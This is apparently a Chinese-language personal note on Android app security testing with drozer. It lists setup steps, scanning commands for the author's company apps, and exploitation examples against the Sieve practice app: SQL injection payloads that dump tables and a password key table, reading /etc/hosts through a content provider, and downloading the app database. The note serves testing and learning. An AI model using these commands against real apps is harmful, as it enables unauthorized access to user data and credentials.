继之前的安全测试学习,对于现有的项目做了部分角度的安全测试。做个记录。
《二》drozer漏洞扫描
工具:drozer
步骤:
准备:
1.运行drozer-agent.apk
2.选择embedded--enable
3.设置端口转发:adb forward tcp:31415 tcp:31415
运行:
1.连接drozer:
drozer.bat console connect
2.列出详细APP信息:
run app.package.info -a com.micen.salesassistant
3.查看APP的配置信息
run app.package.manifest com.micen.buyers.activity
3.分析是否存在攻击攻击点
run app.package.attacksurface com.micen.buyers.activity
4.查看暴露的provider权限
run app.provider.info -a com.micen.buyers.activity
5.获取Activity信息
命令 run app.activity.info -a <package name>
示例 run app.activity.info -a com.micen.buyers.activity
6.检测SQL注入
命令 run scanner.provider.injection -a <package name>
示例 run scanner.provider.injection -a com.micen.buyers.activity
7.检测目录遍历
命令 run scanner.provider.traversal -a <package name>
示例 run scanner.provider.traversal -a com.micen.buyers.activity
8.获取所有可访问的Uri
命令 run scanner.provider.finduris -a <package name>
示例 run scanner.provider.finduris -a com.micen.buyers.activity
9.SQL注入
命令 run app.provider.query <uri> [--projection] [--selection]
示例 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
列出所有表 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
获取单表(如Key)的数据 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
10.读取文件系统下的文件
示例 run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
11.下载数据库文件到本地
示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db